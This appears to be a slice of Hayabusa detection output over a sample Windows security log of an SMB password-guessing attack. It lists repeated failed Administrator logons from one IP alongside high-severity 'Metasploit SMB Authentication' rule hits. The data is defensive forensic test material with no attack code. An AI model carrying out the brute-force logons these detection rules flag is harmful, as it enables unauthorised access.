16382016-09-20 01:50:18.597 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Z0odyPQmvkGRNWZF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16392016-09-20 01:50:18.597 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16402016-09-20 01:50:18.630 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: b5uRpG0fxCK75DPV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16412016-09-20 01:50:18.630 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16422016-09-20 01:50:18.666 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: d9dcEzpJRW5YA8Bj : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16432016-09-20 01:50:18.666 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16442016-09-20 01:50:18.712 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Hv3B9bwB1YIaBa6N : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16452016-09-20 01:50:18.712 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16462016-09-20 01:50:18.743 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: lJf9Obml4aVxE5zp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16472016-09-20 01:50:18.743 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16482016-09-20 01:50:18.776 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mvnSOaRSkGU6Uf5q : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16492016-09-20 01:50:18.776 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16502016-09-20 01:50:18.808 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: JSAkZsZsv0SaLKaO : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16512016-09-20 01:50:18.808 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16522016-09-20 01:50:18.847 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: r6rnM6QbwfbbrcGy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16532016-09-20 01:50:18.847 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16542016-09-20 01:50:18.888 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RX0GW7K5wdQJUx4Y : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16552016-09-20 01:50:18.888 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16562016-09-20 01:50:18.920 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Xm7CpD5i735McsvS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16572016-09-20 01:50:18.920 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16582016-09-20 01:50:18.959 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bHxjZsnR25J47Ez8 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16592016-09-20 01:50:18.959 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16602016-09-20 01:50:18.999 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: J1JWj91m79FyykH6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16612016-09-20 01:50:18.999 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16622016-09-20 01:50:19.043 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: h9i0GncOzpz5REWp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16632016-09-20 01:50:19.043 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16642016-09-20 01:50:19.085 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BODZRJ6G3xxw29VJ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16652016-09-20 01:50:19.085 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16662016-09-20 01:50:19.127 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SJ2lq4piINfmI7Qe : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16672016-09-20 01:50:19.127 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16682016-09-20 01:50:19.167 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: NqDeXdOitJ3WY8w4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16692016-09-20 01:50:19.167 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16702016-09-20 01:50:19.217 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: FnoHQf7QDxoI4tel : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16712016-09-20 01:50:19.217 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16722016-09-20 01:50:19.261 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: FqkbgrtBa5VFxPry : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16732016-09-20 01:50:19.261 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16742016-09-20 01:50:19.300 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: TMD57GtY15bfWBre : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16752016-09-20 01:50:19.300 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16762016-09-20 01:50:19.350 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: e3lT9UgWr82PcAjf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16772016-09-20 01:50:19.350 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16782016-09-20 01:50:19.388 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: SpwhTfFlvvccnI5N : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16792016-09-20 01:50:19.388 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16802016-09-20 01:50:19.432 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 10CfKdnvWf4UVuME : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16812016-09-20 01:50:19.432 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16822016-09-20 01:50:19.539 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YYLMax3okIqntHM1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16832016-09-20 01:50:19.539 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16842016-09-20 01:50:19.602 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qk9TPAK51EdVORwY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16852016-09-20 01:50:19.602 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16862016-09-20 01:50:19.670 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aVKRUnNu2nGslW7P : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16872016-09-20 01:50:19.670 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16882016-09-20 01:50:19.720 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZJ2AYRLcMbMVixg6 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16892016-09-20 01:50:19.720 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16902016-09-20 01:50:19.759 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 6Sl9ucxM2Nu3xjNq : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16912016-09-20 01:50:19.759 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16922016-09-20 01:50:19.801 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AFeBGB6qA7OaYV7l : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16932016-09-20 01:50:19.801 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16942016-09-20 01:50:19.837 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KLUEKG9CzQYsH3Vp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16952016-09-20 01:50:19.837 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16962016-09-20 01:50:19.875 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: vVZ44YKdRYY59zaC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16972016-09-20 01:50:19.875 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16982016-09-20 01:50:19.921 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: umU8pDDZFvvUVsHY : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16992016-09-20 01:50:19.921 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17002016-09-20 01:50:19.965 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Nn7rA0uRegtHgaF1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17012016-09-20 01:50:19.965 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17022016-09-20 01:50:20.008 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 2dgiakCKweT4GUGD : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17032016-09-20 01:50:20.008 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17042016-09-20 01:50:20.039 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: kptipiLujNVePYfy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17052016-09-20 01:50:20.039 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17062016-09-20 01:50:20.091 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: plaXJ1rEGpU3SzV2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17072016-09-20 01:50:20.091 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17082016-09-20 01:50:20.132 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: I4pALF2luLfg36GC : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17092016-09-20 01:50:20.132 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17102016-09-20 01:50:20.173 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZLO4cufbFcRhRy8b : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17112016-09-20 01:50:20.173 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17122016-09-20 01:50:20.215 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: a845OfrFKxy31Yhg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17132016-09-20 01:50:20.215 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17142016-09-20 01:50:20.252 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QnPM7uhs8y4BaP6I : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17152016-09-20 01:50:20.252 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17162016-09-20 01:50:20.288 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7fW5FzQ4jbWDJxXc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17172016-09-20 01:50:20.288 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17182016-09-20 01:50:20.326 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: huKy3ruTPAlx94pI : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17192016-09-20 01:50:20.326 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17202016-09-20 01:50:20.363 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: g78Kx7hkMuUGIoX1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17212016-09-20 01:50:20.363 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17222016-09-20 01:50:20.417 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: erSXtXvMi8Cg1PWw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17232016-09-20 01:50:20.417 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17242016-09-20 01:50:20.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: VaqXgO2US87zoXLl : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17252016-09-20 01:50:20.462 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17262016-09-20 01:50:20.501 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QHEfAfFuAR2pX3LO : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17272016-09-20 01:50:20.501 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17282016-09-20 01:50:20.543 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 4Owk2elGaC5DOm1U : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17292016-09-20 01:50:20.543 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17302016-09-20 01:50:20.580 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: VXPynWzVNADN56a4 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17312016-09-20 01:50:20.580 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17322016-09-20 01:50:20.619 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: xwfwZ0hXFaFwqymH : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
17332016-09-20 01:50:20.619 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
